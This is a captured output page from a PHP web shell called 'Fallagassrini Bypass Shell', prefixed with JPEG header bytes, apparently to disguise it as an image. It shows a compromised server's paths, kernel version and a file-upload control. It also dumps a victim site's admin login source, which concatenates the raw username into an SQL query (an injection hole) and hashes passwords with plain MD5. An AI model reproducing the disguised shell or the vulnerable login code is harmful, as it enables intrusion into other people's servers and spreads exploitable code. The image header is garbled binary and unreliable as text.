JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/tarinient/public_html/admin/

Linux venus.ewebguru.net 4.18.0-553.44.1.el8_10.x86_64 #1 SMP Mon Mar 10 05:10:11 EDT 2025 x86_64
Upload File :
Current File : /home/tarinient/public_html/admin/welcome.php

<?php
session_start();
include('../configuration.php');
include("includes/php_devfunction.php");

$invalid_msg="";
if($_SERVER['REQUEST_METHOD']=="POST" && $_REQUEST["btnsubmit"]=="Login")
{
	$username=$_REQUEST["usrname"];
	$password=$_REQUEST["usrpass"];
		
		
	$usr_qry = "select * from tbl_adminuser where username='".$username."' and password='".md5($password)."' ";
	$result = $db->Execute($usr_qry);
	$total_usr  = $result->RecordCount();
	
	//die;
	
	if($total_usr>0)
	{
					
		//======== Login user id store in the session ====		
		$_SESSION['uniqID'] = $result->fields['id'];
		$_SESSION['username'] = $result->fields['name'];
		$_SESSION['usertype'] = $result->fields['user_type'];
		
		if($result->fields['user_type']=="1")
		{
			url_redirect('welcome.php');
		}
		else
		{
			url_redirect('serviceboard.php');
		}
						
	}	
	else
	{
		$invalid_msg="Invalid username/password. Please try again!";
	}
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
	<link rel="stylesheet" type="text/css" href="css/text.css" />
    <link rel="stylesheet" type="text/css" href="css/grid.css"  />
    <link rel="stylesheet" type="text/css" href="css/layout.css"/>
    <link rel="stylesheet" type="text/css" href="css/nav.css"  />
    <link rel="stylesheet" type="text/css" href="css/reset.css" />
<script src="includes/javascript_function.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript">
//==== Validate form filled by user ================== 
function checkusrval()
{
	//alert('qwqe');
	var usrname=trim(document.frmadmlog.usrname.value);
	var usrpass=trim(document.frmadmlog.usrpass.value);
	
	if(usrname=="")
	{
		alert("User name should not be blank.");
		document.frmadmlog.usrname.focus();
		return false;
	}	
	else if(usrpass=="")
	{
		alert("Password should not be blank.");
		document.frmadmlog.usrpass.focus();
		return false;
	}
	
}
</script>          
</head>

<body style="margin:0px; padding:0px;">
<div class="container_12">
        <div class="grid_12 header-repeat">
        <?php include("includes/service_top.php");?>
        </div>
        <div class="clear">
        </div>
        <?php include("includes/topmenu.php");?>
        <div class="clear">
        </div>
        <div class="grid_2">
        <?php include("includes/leftmenuadm.php");?>    
        </div>
        <div class="grid_10">
            <div class="box round first">
                <h2>Product Sales</h2>
                <div class="block">
                    
                </div>
            </div>
            
        </div>
        
        
        <div class="clear">
        </div>
    </div>
    <div class="clear">
    </div>
    <?php include("includes/footer.php");?>
</body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net